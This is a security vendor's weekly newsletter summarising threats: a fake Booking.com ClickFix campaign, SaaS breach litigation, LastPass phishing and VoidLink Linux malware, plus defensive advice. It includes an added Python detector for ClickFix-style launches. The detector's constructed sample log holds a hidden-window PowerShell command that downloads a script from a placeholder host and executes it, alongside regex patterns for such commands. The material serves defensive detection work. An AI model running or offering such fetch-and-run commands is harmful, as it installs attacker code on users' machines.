Reduce risk across endpoints, SaaS, and cloud environments.
ThreatLocker: Zero Trust Weekly

This week in Zero Trust

Here are your weekly tips to stay ahead of cyber threats.

Estimated reading time: 6-7 minutes


In this issue:

  • Booking a holiday ends in ClickFix compromise: Cloudflare verification used to deploy malware.
  • SaaS trust on trial: Recent SaaS breaches to learn from.
  • How to build a modern security operations team: Build the team that brings policy framework to life.
  • Silent heists: Why modern breaches are designed to go unnoticed.
  • Threats you need to know: LastPass phishing campaign and new Linux malware framework.

From the CEO

Keep your guard up


"Threats are always evolving, so a once-a-year audit is not sufficient. All systems should be undergoing regular penetration testing and improvement." - Danny Jenkins

From the ThreatLocker blog

The growing gap between detection and reality


Fake Booking[.]com ClickFix attack uses Cloudflare to deliver malware

  • What you need to know: ThreatLocker Threat Intelligence uncovered an active ClickFix social engineering campaign using a malicious site impersonating Booking[.]com to trick victims into executing harmful commands, ultimately leading to malware installation. Users trying to access travel info are redirected to a spoofed subdomain that mimics familiar CAPTCHA-style Cloudflare verification prompts. When the user clicks the checkbox, malicious commands are silently copied to their clipboard, and they are instructed to run them via the Windows Run dialog.
  • Why it matters: In this instance, attackers are using a familiar verification check to exploit user trust. Instead of exploiting software vulnerabilities, this attack relies on convincing users to run malicious commands themselves, and instead of dropping a single piece of malware, it chains multiple execution stages that end in remote access. Because the malware is installed through legitimate tools like PowerShell, GitHub, and Node.js, it blends in with normal activity and can evade detection-focused defenses.
  • Key takeaways: Familiar interfaces and trusted brands are increasingly being weaponized for social engineering, and user-initiated execution is a critical blind spot for controls that rely on detection alone. Train employees to recognize fake subdomains, fake CAPTCHA, and fake verification screens. Restrict script execution that isn't explicitly approved, and limit approved applications to access only the files needed.
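As an added illustration of the blind spot this campaign exploits (example code, not ThreatLocker's tooling or part of the original newsletter), the Python below triages constructed process-creation events: the Run dialog launches its command as a child of explorer.exe, so an interpreter spawned there with a hidden-window, remote-fetch or Node.js command line is the user-initiated execution worth alerting on. The log format, the trait patterns and the domain verify.example.invalid are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Interpreters a Run-dialog paste typically launches (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "node.exe", "wscript.exe"}
# Command-line traits matching the campaign as described above: hidden windows,
# remote fetches, encoded payloads, GitHub staging and a Node.js runtime.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "remote_fetch": re.compile(r"invoke-webrequest|\biwr\b|downloadstring|\bcurl\b|https?://", re.I),
    "encoded_cmd": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "github_stage": re.compile(r"github(?:usercontent)?\.com", re.I),
    "node_runtime": re.compile(r"\bnode(?:\.exe)?\b", re.I),
}
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="quoted value"

@dataclass
class Verdict:
    user: str
    image: str
    traits: list = field(default_factory=list)

def parse_event(line: str) -> dict:
    """Turn one constructed 'key=value' process-creation line into a dict."""
    return {k: quoted or bare for k, quoted, bare in KV.findall(line)}

def assess(event: dict):
    """Flag an interpreter spawned by explorer.exe (the Run dialog's parent)
    whose command line shows at least one of the traits above; else None."""
    parent = PureWindowsPath(event.get("parent", "")).name.lower()
    image = PureWindowsPath(event.get("image", "")).name.lower()
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return None
    cmdline = event.get("cmdline", "")
    hits = [name for name, rx in TRAITS.items() if rx.search(cmdline)]
    return Verdict(event.get("user", "?"), image, hits) if hits else None

def triage(lines) -> list:
    """Return a Verdict for every line that matches the ClickFix pattern."""
    return [v for v in (assess(parse_event(line)) for line in lines) if v]

# Constructed sample telemetry (not real data): one Run-dialog paste matching
# the campaign's pattern, one interactive console launch, one scheduled task.
SAMPLE_LOG = [
    r'ts=2026-02-10T09:14:02Z user=CORP\jdoe parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -w hidden -NoProfile -c Invoke-WebRequest https://verify.example.invalid/check.js -OutFile C:\Users\jdoe\AppData\Local\Temp\check.js; node C:\Users\jdoe\AppData\Local\Temp\check.js"',
    r'ts=2026-02-10T09:20:11Z user=CORP\jdoe parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe"',
    r'ts=2026-02-10T10:00:00Z user="NT AUTHORITY\SYSTEM" parent=C:\Windows\System32\svchost.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NoProfile -File C:\Scripts\backup.ps1"',
]
```

An explorer.exe parent on its own is not suspicious (users open consoles from Run as well), which is why the second sample line is not flagged; this triage complements the execution restrictions in the takeaways rather than replacing them.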

SaaS trust on trial

  • What you need to know: A new class action complaint, Morton v. Salesforce Inc. and TransUnion LLC, centers on a wave of 2025 social engineering attacks that allegedly used voice phishing to compromise Salesforce tenants and then pivot into other SaaS environments. The plaintiff’s theory portrays Salesforce as the “hub” that enabled downstream breaches, including a TransUnion incident in which attackers accessed the personal data of more than 4 million people through a third-party application. While the complaint describes these claims and attack techniques in detail, many of them remain unproven allegations rather than adjudicated facts.
  • Why it matters: This case highlights a broader security challenge for SaaS environments. Attackers are increasingly targeting human trust and legitimate workflows, like voice-led approvals and authorized integrations, to gain broad access to sensitive data and move laterally between cloud services. The complaint’s narrative underscores how a compromised SaaS access path can expose vast amounts of information and raise complex questions around platform liability, breach notification, and the adequacy of existing security controls.
  • Key takeaways: Security teams should reassess how SaaS permissions, integrations, and voice-based approvals are governed. Action items include enforcing least-privilege access for SaaS users and apps, reviewing and limiting third-party OAuth and API integrations, adding approval safeguards for high-risk actions, and treating SaaS-to-SaaS connections as untrusted by default.

Security operations are people-driven

  • What you need to know: Modern security operations teams must evolve beyond alert-driven monitoring and reactive incident response. As attack techniques increasingly rely on legitimate tools, trusted workflows, and user-initiated actions, traditional SOC models built around detection and triage struggle to keep up. The shift is toward prevention-first strategies, tighter alignment between security and IT operations, and tooling that reduces noise while enforcing policies by default.
  • Why it matters: Security teams are facing alert fatigue, staffing shortages, and increasingly stealthy attacks that don’t trigger obvious IoCs. When attackers operate inside “allowed” behaviors like approved apps, scripts, and SaaS tools, detection alone becomes unreliable and slow. A modern SecOps model prioritizes stopping unauthorized activity before it runs, reducing the burden on analysts, and shrinking dwell time rather than expecting teams to investigate their way out of every incident.
  • What you can do: Eliminate unnecessary execution paths, enforce least privilege across endpoints and SaaS platforms, and integrate security controls directly into operational workflows. Action items include reducing reliance on reactive alerts, standardizing allowlists for applications and scripts, improving collaboration between IT and security teams, and investing in controls that block unknown or unapproved activity by default.

Criminals increasingly favor under-the-radar data theft over outright disruption

  • What you need to know: Rather than triggering outages or ransomware alarms, attackers infiltrate environments, blend into legitimate activity, and steal data over time without raising suspicion. These “silent heists” are costly and persistent, with the average data breach costing more than $4.6 million and taking nearly nine months to identify and contain. AI-driven tools are accelerating this shift by enabling attackers to move faster, adapt in real time, and exploit trusted credentials, workflows, and LOTL techniques.
  • Why it matters: Exfiltration is harder to detect, often masked by legitimate tools and normal network behavior, and frequently paired with extortion or regulatory fallout long after the breach occurs. AI-enhanced phishing, credential abuse, and shadow AI tools further expand the attack surface, allowing both malicious actors and unwitting employees to expose sensitive data. By the time organizations realize data has been taken, the damage is already done.
  • What you can do: Reduce reliance on IoCs and focus on restricting what can run, connect, and exfiltrate data by default. Control what software and scripts can run with allowlisting, tighten credential and MFA enforcement across cloud and third-party platforms, monitor abnormal outbound connections, and limit the use of unapproved AI tools. Pairing default-deny controls with real-time behavioral monitoring and operational oversight helps shorten dwell time and stop quiet breaches before they turn into public crises.

Threats you need to know

Emerging threats abusing credentials, cloud, and “business-as-usual” workflows


LastPass phishing campaign targets password vault credentials

  • What happened: A phishing campaign targeted LastPass users by impersonating backup or recovery-related requests, attempting to trick recipients into clicking malicious links and entering their credentials. The emails were framed as routine account or backup actions rather than urgent security alerts, making them less likely to arouse suspicion. Once credentials are harvested, attackers can gain access to password vaults, opening the door to downstream compromise.
  • Why it matters: Password managers are high-value targets because they often serve as a gateway to multiple internal systems, cloud platforms, and customer environments. A single successful credential theft can cascade into widespread access, lateral movement, and potential customer impact. This campaign reinforces that attackers are increasingly abusing “business-as-usual” workflows rather than overtly malicious prompts. If a privileged user or administrator is compromised, the blast radius can extend well beyond one account.
  • What you can do: Restrict access to vaults based on role and necessity, and educate users to scrutinize operational emails.

AI-assisted Linux malware framework targets cloud infrastructure

  • What happened: Researchers uncovered a sophisticated new Linux malware framework called VoidLink that appears to have been built with significant assistance from AI, enabling rapid development of a feature-rich toolkit in record time. The framework is designed for long-term, stealthy access to Linux-based cloud and container environments and includes modular loaders, implants, rootkits, and more than 30 plug-ins that support reconnaissance, credential harvesting, lateral movement, and evasion. It can identify whether it’s running inside public cloud platforms such as AWS, Azure, or Google Cloud and adapt accordingly, making detection and removal more difficult.
  • Why it matters: VoidLink’s cloud-native design makes high-value Linux environments attractive targets. Its modular, adaptive behavior enables attackers to remain hidden for long periods, harvest critical credentials (including cloud credentials), and customize attacks for each target environment. The use of AI to accelerate malware development also lowers the bar for sophisticated tooling, meaning more threat actors can potentially field advanced frameworks with less effort and cost than ever before.
  • What you can do: Enhance visibility into cloud and container workloads, extend threat detection and response to include runtime and API activity, and enforce least-privilege credentials and MFA across all cloud access points. Monitoring for anomalous lateral movement and unauthorized credential harvesting is essential. Finally, integrating real-time behavioral analytics, Zero Trust network segmentation, and incident response playbooks for cloud infrastructure helps prepare teams to detect and disrupt sophisticated, modular threats before they achieve persistence.

ThreatLocker Zero Trust World 2026, Orlando, FL, March 4-6

Detection alone isn’t enough, trust assumptions are breaking, and security leaders are being asked to move faster with fewer resources.


That’s why conversations at Zero Trust World 2026 are focused on how security, technology, and human decision-making must evolve together.


ZTW 26 keynote speakers:

  • Marcus Hutchins: Rethinking Cyber Defense in an Era of High Velocity Attacks
  • Jason Silva: Augmented Humanity
  • Linus + Luke: When Should Cybersecurity Become a Priority for Your Business?
  • NetApp: Securing Large Complex Organizations
  • David Spark, Michelle Wilson, & Rob Allen: CISO Series Podcast LIVE
  • Danny Jenkins & Rob Allen: Challenges Accepted Innovation Hour

Don't just track emerging threats. Outpace them.

Join Zero Trust World 2026

Use code ZTWWEEKLY26 to save $200 on your registration.

Cyber Hero Frontline, a magazine by ThreatLocker

Become more secure.


Real-world insights. Best practices. Stories from everyday cyber defenders.

Read Cyber Hero Frontline

P.S. The third issue of Cyber Hero Frontline will be released in March. To receive your copy, let us know your current address at the button above. You can also send a copy to a friend.

ThreatLocker: Zero Trust Platform | Zero Trust Weekly

ThreatLocker, 1950 Summit Park Dr, Floor 4, Orlando, Florida 32810, United States


©2026 ThreatLocker Inc., All Rights Reserved